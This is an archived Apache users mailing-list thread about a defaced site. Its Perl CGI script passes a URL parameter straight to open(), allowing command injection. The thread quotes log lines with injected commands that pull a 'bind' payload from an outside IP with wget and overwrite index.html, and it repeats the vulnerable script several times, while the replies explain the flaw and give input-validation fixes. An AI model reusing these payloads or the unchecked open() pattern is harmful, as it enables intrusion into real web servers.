> be passed as parameter to the CGI file. I included the CGI code in my
> earlier mail, could you please take a look.
> Thanks,
> Murthy
>
> */"Ivan Barrera A."
/* wrote:
>
> the url you entered, download the file bind to /tmp/bind . It's
> probably
> an irc bot or a backdoor.
> If someone did that, the version of the cgi script, is unsecure, and
> should be revised.
>
> Im sorry if i didnt clarify enough, but would be useful to see that cgi.
>
> Murthy Ambaru wrote:
> > I have a question regarding security. There is a web site that
> has an
> > printer friendly version of web pages being dsiplayed using a CGI
> > script. Apparently when this was in use, the site was hacked and
> some
> > unwanted stuff posted on the site. I had a look at the access.log
> when
> > this occurred and this was what showed up(I just replaced the
> site name
> > with xyz, everything else is same):
> >
> >
> > /images/newswireprint.gif HTTP/1.0" 304 -
> >
> > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> >
> > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> >
> >
> > GET
> >
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> > hosts/xyz.org/httpdocs/index.html|
> >
> > Can anyone understand how are they able to hack? I tried
> reproducing it
> > by typing in the above URL used by hackers, but could get nothing
> out of
> > it. The permissions on all the html docs folders are set to 755.
> >
> > Below is the CGI file being used. It basically strips images off.
> Can
> > anyone help with this problem? what should i be looking at to
> plug off
> > the security holes....Thanks a lot
> >
> > -Murthy
> >
> >
> >
> > #!/usr/local/bin/perl
> >
> > print "Content-type: text/html\n\n";
> >
> > &parseForm;
> >
> > open(HEADER,"printheader.html") ;
> > my @HEADER = ;
> > close(HEADER);
> > #print it! Put a # before print if you don't want a header printed...
> > print "@HEADER";
> >
> > my $data_file =
> > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> >
> > if (!open(FILE,"$data_file")) { die "Can't open";}
> > my @FILE = ;
> > close(FILE);
> >
> > $print = 1 ;
> >
> > foreach $line(@FILE) {
> >
> > if ($line =~ /beginimage/) {
> > print $line ;
> > $print = 0;
> > next ;
> > }
> >
> > if ($line =~ /endimage/) { $print = 1 ; }
> >
> > if ($print eq "1") {
> > print $line;
> > }
> >
> > }
> >
> >
> > ########################################################
> >
> > sub parseForm {
> >
> > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > # Split the name-value pairs
> > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > }
> > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> >
> >
> > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> >
> > # Split the name-value pairs
> > @pairs = split(/&/, $buffer);
> > }
> > foreach $pair (@pairs) {
> > ($name, $value) = split(/=/, $pair);
> >
> > # Un-Webify plus signs and %-encoding
> > $value =~ tr/+/ /;
> > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> >
> > $FORM{$name} = $value;
> > }
> >
> > }
> >
> >
> >
> >
> >
> ------------------------------------------------------------------------
> > Do you Yahoo!?
> > Meet the all-new My Yahoo! � Try it today!
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
> Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> The all-new My Yahoo! � What will yours do?
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------
Do you Yahoo!?
Yahoo! Mail - 250MB free storage. Do more. Manage less.
Re: [users@httpd] Security Problem
Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
I mean, the cgi script (which i dont know anything about) seems to "open
" a file reffered by ?file= ... Probably an insecure way of "opening"
the file, leads to execute the rest of the statement.
Look :
?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
is appended. So , if the script execute this, the command wget will
exec, and download that file into /tmp/bind.
After that, using the same technique, you can exec anything you want. so
the problem is the way of opening (or doing something else) to the files
in the cgi script.
is it a c , perl , php , or any other language script ?
Murthy Ambaru wrote:
> Thanks for the response Ivan. I am sorry i realy did not understand what
> you mean by "download the file to /tmp/bind". when the printer friendly
> link is clicked, this is the URL that will be accessed:
> http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> ofcourse it depends on the page being clicked at. So the file name will
> be passed as parameter to the CGI file. I included the CGI code in my
> earlier mail, could you please take a look.
> Thanks,
> Murthy
>
> */"Ivan Barrera A." <Br...@Ivn.cl>/* wrote:
>
> the url you entered, download the file bind to /tmp/bind . It's
> probably
> an irc bot or a backdoor.
> If someone did that, the version of the cgi script, is unsecure, and
> should be revised.
>
> Im sorry if i didnt clarify enough, but would be useful to see that cgi.
>
> Murthy Ambaru wrote:
> > I have a question regarding security. There is a web site that
> has an
> > printer friendly version of web pages being dsiplayed using a CGI
> > script. Apparently when this was in use, the site was hacked and
> some
> > unwanted stuff posted on the site. I had a look at the access.log
> when
> > this occurred and this was what showed up(I just replaced the
> site name
> > with xyz, everything else is same):
> >
> >
> > /images/newswireprint.gif HTTP/1.0" 304 -
> >
> > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> >
> > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> >
> >
> > GET
> >
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> > hosts/xyz.org/httpdocs/index.html|
> >
> > Can anyone understand how are they able to hack? I tried
> reproducing it
> > by typing in the above URL used by hackers, but could get nothing
> out of
> > it. The permissions on all the html docs folders are set to 755.
> >
> > Below is the CGI file being used. It basically strips images off.
> Can
> > anyone help with this problem? what should i be looking at to
> plug off
> > the security holes....Thanks a lot
> >
> > -Murthy
> >
> >
> >
> > #!/usr/local/bin/perl
> >
> > print "Content-type: text/html\n\n";
> >
> > &parseForm;
> >
> > open(HEADER,"printheader.html") ;
> > my @HEADER = ;
> > close(HEADER);
> > #print it! Put a # before print if you don't want a header printed...
> > print "@HEADER";
> >
> > my $data_file =
> > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> >
> > if (!open(FILE,"$data_file")) { die "Can't open";}
> > my @FILE = ;
> > close(FILE);
> >
> > $print = 1 ;
> >
> > foreach $line(@FILE) {
> >
> > if ($line =~ /beginimage/) {
> > print $line ;
> > $print = 0;
> > next ;
> > }
> >
> > if ($line =~ /endimage/) { $print = 1 ; }
> >
> > if ($print eq "1") {
> > print $line;
> > }
> >
> > }
> >
> >
> > ########################################################
> >
> > sub parseForm {
> >
> > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > # Split the name-value pairs
> > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > }
> > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> >
> >
> > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> >
> > # Split the name-value pairs
> > @pairs = split(/&/, $buffer);
> > }
> > foreach $pair (@pairs) {
> > ($name, $value) = split(/=/, $pair);
> >
> > # Un-Webify plus signs and %-encoding
> > $value =~ tr/+/ /;
> > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> >
> > $FORM{$name} = $value;
> > }
> >
> > }
> >
> >
> >
> >
> >
> ------------------------------------------------------------------------
> > Do you Yahoo!?
> > Meet the all-new My Yahoo! – Try it today!
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
> Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> The all-new My Yahoo! <http://my.yahoo.com> – What will yours do?
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security Problem
Posted by Murthy Ambaru <bo...@yahoo.com>.
Thanks for the response Ivan. I am sorry i realy did not understand what you mean by "download the file to /tmp/bind". when the printer friendly link is clicked, this is the URL that will be accessed:
http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
ofcourse it depends on the page being clicked at. So the file name will be passed as parameter to the CGI file. I included the CGI code in my earlier mail, could you please take a look.
Thanks,
Murthy
"Ivan Barrera A." <Br...@Ivn.cl> wrote:
the url you entered, download the file bind to /tmp/bind . It's probably
an irc bot or a backdoor.
If someone did that, the version of the cgi script, is unsecure, and
should be revised.
Im sorry if i didnt clarify enough, but would be useful to see that cgi.
Murthy Ambaru wrote:
> I have a question regarding security. There is a web site that has an
> printer friendly version of web pages being dsiplayed using a CGI
> script. Apparently when this was in use, the site was hacked and some
> unwanted stuff posted on the site. I had a look at the access.log when
> this occurred and this was what showed up(I just replaced the site name
> with xyz, everything else is same):
>
>
> /images/newswireprint.gif HTTP/1.0" 304 -
>
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
>
> 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
>
>
> GET
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> hosts/xyz.org/httpdocs/index.html|
>
> Can anyone understand how are they able to hack? I tried reproducing it
> by typing in the above URL used by hackers, but could get nothing out of
> it. The permissions on all the html docs folders are set to 755.
>
> Below is the CGI file being used. It basically strips images off. Can
> anyone help with this problem? what should i be looking at to plug off
> the security holes....Thanks a lot
>
> -Murthy
>
>
>
> #!/usr/local/bin/perl
>
> print "Content-type: text/html\n\n";
>
> &parseForm;
>
> open(HEADER,"printheader.html") ;
> my @HEADER = ;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
>
> my $data_file =
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = ;
> close(FILE);
>
> $print = 1 ;
>
> foreach $line(@FILE) {
>
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
>
> if ($line =~ /endimage/) { $print = 1 ; }
>
> if ($print eq "1") {
> print $line;
> }
>
> }
>
>
> ########################################################
>
> sub parseForm {
>
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>
>
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
>
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
>
> $FORM{$name} = $value;
> }
>
> }
>
>
>
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Meet the all-new My Yahoo! � Try it today!
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------
Do you Yahoo!?
The all-new My Yahoo! � What will yours do?
Re: [users@httpd] Security Problem
Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
the url you entered, download the file bind to /tmp/bind . It's probably
an irc bot or a backdoor.
If someone did that, the version of the cgi script, is unsecure, and
should be revised.
Im sorry if i didnt clarify enough, but would be useful to see that cgi.
Murthy Ambaru wrote:
> I have a question regarding security. There is a web site that has an
> printer friendly version of web pages being dsiplayed using a CGI
> script. Apparently when this was in use, the site was hacked and some
> unwanted stuff posted on the site. I had a look at the access.log when
> this occurred and this was what showed up(I just replaced the site name
> with xyz, everything else is same):
>
>
> /images/newswireprint.gif HTTP/1.0" 304 -
>
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
>
> 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| <http://64.58.72.242/bind%20-O/tmp/bind%7C>" "Mozilla/4.0
>
>
> GET
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> hosts/xyz.org/httpdocs/index.html|
>
> Can anyone understand how are they able to hack? I tried reproducing it
> by typing in the above URL used by hackers, but could get nothing out of
> it. The permissions on all the html docs folders are set to 755.
>
> Below is the CGI file being used. It basically strips images off. Can
> anyone help with this problem? what should i be looking at to plug off
> the security holes....Thanks a lot
>
> -Murthy
>
>
>
> #!/usr/local/bin/perl
>
> print "Content-type: text/html\n\n";
>
> &parseForm;
>
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
>
> my $data_file =
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = <FILE>;
> close(FILE);
>
> $print = 1 ;
>
> foreach $line(@FILE) {
>
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
>
> if ($line =~ /endimage/) { $print = 1 ; }
>
> if ($print eq "1") {
> print $line;
> }
>
> }
>
>
> ########################################################
>
> sub parseForm {
>
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>
>
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
>
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
>
> $FORM{$name} = $value;
> }
>
> }
>
>
>
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Meet the all-new My Yahoo! <http://my.yahoo.com> – Try it today!
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security Problem
Posted by Murthy Ambaru <bo...@yahoo.com>.
Thanks a lot for the information Scott...Its very helpful
Can you answer another question :
"Also, you should avoid having permissions set up such that CGI scripts
are allowed to overwrite your Web pages. That would have prevented
this, although there are a host of other security problems it wouldn't
make a difference for."
Isn't the permission for CGI scripts same as world permissions? if it is different, how do i set it. Right now the HTML files have 755 access. That should be fine, right??
Thanks,
Murthy
Scott Gifford <sg...@suspectclass.com> wrote:
Murthy Ambaru writes:
[...]
> /images/newswireprint.gif HTTP/1.0" 304 -
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0
>
> GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> hosts/xyz.org/httpdocs/index.html|
>
> Can anyone understand how are they able to hack?
[...]
> #!/usr/local/bin/perl
>
> print "Content-type: text/html\n\n";
>
> &parseForm;
>
> open(HEADER,"printheader.html") ;
> my @HEADER = ;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
>
> my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>
> if (!open(FILE,"$data_file")) { die "Can't open";}
This is a Perl question really; you should try asking on a Perl
mailing list/newsgroup or on PerlMonks.org, where you'd get a much
more complete answer from lots of experts. I'll be happy to do my
best, though.
The essential problem is that Perl's open command will execute a
command if the name of the file it's opening ends with a pipe, so you
can do something like:
open(LS,"ls |");
to read the output of ls. In this case, it's trying to open:
/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file} |echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html |
which ends up running:
echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html
which is how the page got hacked.
The solution is to disallow any characters besides letters and numbers
from the filename when you're accepting it, with something like:
if ($FORM{file} =~ /^([\w.]+)$/)
{
$data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$1";
}
else
{
die "Illegal characters in data file";
}
You should really run your script in taint mode, by starting it with:
#!/usr/local/bin/perl -T
That will make these sorts of things into runtime errors instead of
security issues, and will force you to fix similar problems in your
program.
Also, you should avoid having permissions set up such that CGI scripts
are allowed to overwrite your Web pages. That would have prevented
this, although there are a host of other security problems it wouldn't
make a difference for.
You may want to read up on this topic, with something like:
http://cvs.sourceforge.net/viewcvs.py/*checkout*/brian-d-foy/CGI_MetaFAQ/CGI_MetaFAQ.html?rev=HEAD&content-type=text/html#security
It's important to have a good understanding of security if you plan on
writing or taking responsibility for any sort of program that
interacts with the outside world, like a CGI script.
----ScottG.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.
Re: [users@httpd] Security Problem
Posted by Scott Gifford <sg...@suspectclass.com>.
Murthy Ambaru <bo...@yahoo.com> writes:
[...]
> /images/newswireprint.gif HTTP/1.0" 304 -
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0
>
> GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> hosts/xyz.org/httpdocs/index.html|
>
> Can anyone understand how are they able to hack?
[...]
> #!/usr/local/bin/perl
>
> print "Content-type: text/html\n\n";
>
> &parseForm;
>
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
>
> my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>
> if (!open(FILE,"$data_file")) { die "Can't open";}
This is a Perl question really; you should try asking on a Perl
mailing list/newsgroup or on PerlMonks.org, where you'd get a much
more complete answer from lots of experts. I'll be happy to do my
best, though.
The essential problem is that Perl's open command will execute a
command if the name of the file it's opening ends with a pipe, so you
can do something like:
open(LS,"ls |");
to read the output of ls. In this case, it's trying to open:
/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file} |echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html |
which ends up running:
echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html
which is how the page got hacked.
The solution is to disallow any characters besides letters and numbers
from the filename when you're accepting it, with something like:
if ($FORM{file} =~ /^([\w.]+)$/)
{
$data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$1";
}
else
{
die "Illegal characters in data file";
}
You should really run your script in taint mode, by starting it with:
#!/usr/local/bin/perl -T
That will make these sorts of things into runtime errors instead of
security issues, and will force you to fix similar problems in your
program.
Also, you should avoid having permissions set up such that CGI scripts
are allowed to overwrite your Web pages. That would have prevented
this, although there are a host of other security problems it wouldn't
make a difference for.
You may want to read up on this topic, with something like:
http://cvs.sourceforge.net/viewcvs.py/*checkout*/brian-d-foy/CGI_MetaFAQ/CGI_MetaFAQ.html?rev=HEAD&content-type=text/html#security
It's important to have a good understanding of security if you plan on
writing or taking responsibility for any sort of program that
interacts with the outside world, like a CGI script.
----ScottG.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security Problem
Posted by Dick Davies <ra...@hellooperator.net>.
* Murthy Ambaru <bo...@yahoo.com> [1224 20:24]:
> I have a question regarding security. There is a web site that has an printer friendly version of web pages being dsiplayed using a CGI script. Apparently when this was in use, the site was hacked and some unwanted stuff posted on the site. I had a look at the access.log when this occurred and this was what showed up(I just replaced the site name with xyz, everything else is same):
>
>
> /images/newswireprint.gif HTTP/1.0" 304 -
>
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0
>
> GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v hosts/xyz.org/httpdocs/index.html|
>
> Can anyone understand how are they able to hack? I tried reproducing it by typing in the above URL used by hackers, but could get nothing out of it.
> The permissions on all the html docs folders are set to 755.
That doesnt' help you if apache can write to them, because your cgi is running as apache.
parseForm() doesn't check parameters properly. ?file=whatever is your problem here.
I can call your cgi with file=<whatever I like>, and that's what's happened.
when you come to run this line:
> if (!open(FILE,"$data_file")) { die "Can't open";}
you actually open '|echo innocent boys.....> /data/httpd/v hosts/xyz.org/httpdocs/index.html'
i.e. you overwrite your index page with a 'we are leet' type message.
a similar thing with the 'wget' line causes your server to pull stuff down off the net onto your machine,
it will be simple to run that script too. Chances are you have worse than just a defaced website....
> Below is the CGI file being used. It basically strips images off.
> Can anyone help with this problem?
> what should i be looking at to plug off the security holes....
Sack your programmer :) and get someone in who understands network programming, cgis need to be very
careful when accepting arguments off the net.
> #!/usr/local/bin/perl
>
> print "Content-type: text/html\n\n";
>
> &parseForm;
>
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
>
> my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = <FILE>;
> close(FILE);
>
> $print = 1 ;
>
> foreach $line(@FILE) {
>
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
>
> if ($line =~ /endimage/) { $print = 1 ; }
>
> if ($print eq "1") {
> print $line;
> }
>
> }
>
>
> ########################################################
>
> sub parseForm {
>
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>
>
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
>
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
>
> $FORM{$name} = $value;
> }
>
> }
>
>
>
>
>
> ---------------------------------
> Do you Yahoo!?
> Meet the all-new My Yahoo! � Try it today!
--
Oh, wait you're serious. Let me laugh even harder. - Bender
Rasputin :: Jack of All Trades - Master of Nuns
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org